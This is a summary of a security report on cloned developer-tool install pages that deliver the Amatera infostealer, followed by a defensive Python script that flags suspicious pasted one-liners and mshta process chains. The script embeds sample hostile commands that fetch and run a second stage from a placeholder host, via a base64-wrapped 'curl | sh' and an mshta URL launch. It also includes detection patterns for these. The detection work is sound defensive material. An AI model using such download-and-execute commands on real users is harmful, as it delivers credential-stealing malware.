Attackers are cloning install pages for Claude Code and other developer tools, replacing the legitimate one-liner install command with a malicious script that deploys the Amatera infostealer. The technique, dubbed InstallFix, targets both Windows and macOS users. On macOS, a base64-obfuscated second-stage script downloads and executes a binary; on Windows, cmd.exe launches mshta.exe, a signed Microsoft binary, so the malicious payload runs under a trusted process. The infostealer harvests browser passwords, cookies, session tokens, and crypto wallet data. Recommendations include pausing before running terminal commands, checking the install command against the official documentation, not copying commands from untrusted sites, and running real-time anti-malware tooling.
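The defensive checks that follow from this description can be expressed as a small triage script. The example below is added here and is not code from the article or from any vendor; the indicator patterns, the allowlist and all sample commands and process events are constructed for illustration (the `.example` hostnames are reserved placeholders). It covers both shapes the article names: it flags a pasted one-liner that pipes a base64-decoded blob into a shell (peeling the base64 layer to inspect the hidden stage), flags mshta invoked with a URL, compares every download host against an organisation's allowlist of official installer sources, and separately flags the cmd.exe to mshta.exe process chain in endpoint telemetry.

```python
"""Defensive triage for copy-pasted install one-liners and endpoint process events.

Added example; not code from the article or from any vendor. Indicator
patterns, the allowlist and every sample below are constructed for
illustration (.example hostnames are reserved placeholders).
"""
import base64
import re
from urllib.parse import urlparse

# Hosts an organisation has confirmed from vendor documentation as the only
# sources its developers should fetch installers from (constructed placeholder).
OFFICIAL_INSTALL_HOSTS = {"docs.vendor.example", "releases.vendor.example"}

URL_RE = re.compile(r"https?://[^\s'\"|;&<>)]+")
# A quoted/unquoted base64 blob piped into a base64 decoder (the macOS variant).
B64_RE = re.compile(
    r"['\"]?([A-Za-z0-9+/]{16,}={0,2})['\"]?\s*\|\s*base64\s+(?:-d|--decode|-D)\b")

# (name, severity, pattern): heuristics for the InstallFix shapes described above.
INDICATORS = [
    ("base64_decode_to_shell", "high",
     re.compile(r"base64\s+(?:-d|--decode|-D)\s*\|\s*(?:sudo\s+)?(?:ba|z|da)?sh\b")),
    ("mshta_with_url", "high", re.compile(r"\bmshta(?:\.exe)?\b.*https?://", re.I)),
    ("powershell_encoded", "high",
     re.compile(r"\bpowershell(?:\.exe)?\b[^|]*\s-(?:e|ec|enc|encodedcommand)\s", re.I)),
    ("pipe_to_shell", "medium", re.compile(r"\|\s*(?:sudo\s+)?(?:ba|z|da)?sh\b")),
]


def hosts_in(cmd):
    """Return the hostnames of every URL that appears in the command."""
    return [urlparse(u).hostname or "" for u in URL_RE.findall(cmd)]


def triage_command(cmd, depth=0):
    """Score a pasted command; returns {"verdict": block|review|pass, "findings": [...]}."""
    findings = [(name, sev) for name, sev, rx in INDICATORS if rx.search(cmd)]
    for host in hosts_in(cmd):
        if host not in OFFICIAL_INSTALL_HOSTS:
            findings.append((f"unlisted_host:{host}", "medium"))
    # Peel one base64 layer so the hidden second stage is inspected as well.
    m = B64_RE.search(cmd)
    if m and depth < 2:
        try:
            inner = base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace")
        except ValueError:
            inner = ""
        if inner:
            nested = triage_command(inner, depth + 1)["findings"]
            findings += [(f"decoded:{n}", s) for n, s in nested]
    sevs = {s for _, s in findings}
    verdict = "block" if "high" in sevs else "review" if "medium" in sevs else "pass"
    return {"verdict": verdict, "findings": findings}


def flag_process_events(events):
    """Return pids of mshta.exe started by a shell with a URL on its command line."""
    hits = []
    for ev in events:
        parent = ev["parent_image"].lower().rsplit("\\", 1)[-1]
        image = ev["image"].lower().rsplit("\\", 1)[-1]
        if (image == "mshta.exe" and parent in {"cmd.exe", "powershell.exe"}
                and URL_RE.search(ev["cmdline"])):
            hits.append(ev["pid"])
    return hits


# Constructed samples: one legitimate-looking one-liner, the two cloned-page shapes,
# and a plain download with no execution step.
_INNER = "curl -fsSL http://cdn.cloned-site.example/stage2 | sh"
SAMPLES = {
    "official": "curl -fsSL https://docs.vendor.example/install.sh | bash",
    "macos_clone": "echo '" + base64.b64encode(_INNER.encode()).decode() + "' | base64 -d | sh",
    "windows_clone": "cmd.exe /c mshta https://cdn.cloned-site.example/setup.hta",
    "plain_download": "curl -LO https://releases.vendor.example/cli-1.0.tgz",
}

# Constructed endpoint process-creation events (Sysmon-style fields, simplified).
SAMPLE_EVENTS = [
    {"pid": 4120, "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe"},
    {"pid": 4188, "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta https://cdn.cloned-site.example/setup.hta"},
    {"pid": 5002, "parent_image": r"C:\Windows\System32\svchost.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe C:\\Windows\\System32\\local.hta"},
]

if __name__ == "__main__":
    for label, cmd in SAMPLES.items():
        r = triage_command(cmd)
        print(f"{label:14} {r['verdict']:6} {r['findings']}")
    print("suspicious mshta pids:", flag_process_events(SAMPLE_EVENTS))
```

Note that the allowlisted `curl | bash` still comes back as `review`, not `pass`: piping a download straight into a shell deserves a look even from an official host, which is the article's "slow down" advice in code form. The verdicts are heuristics for a pre-paste check or a SIEM rule, not a substitute for the anti-malware tooling the article recommends.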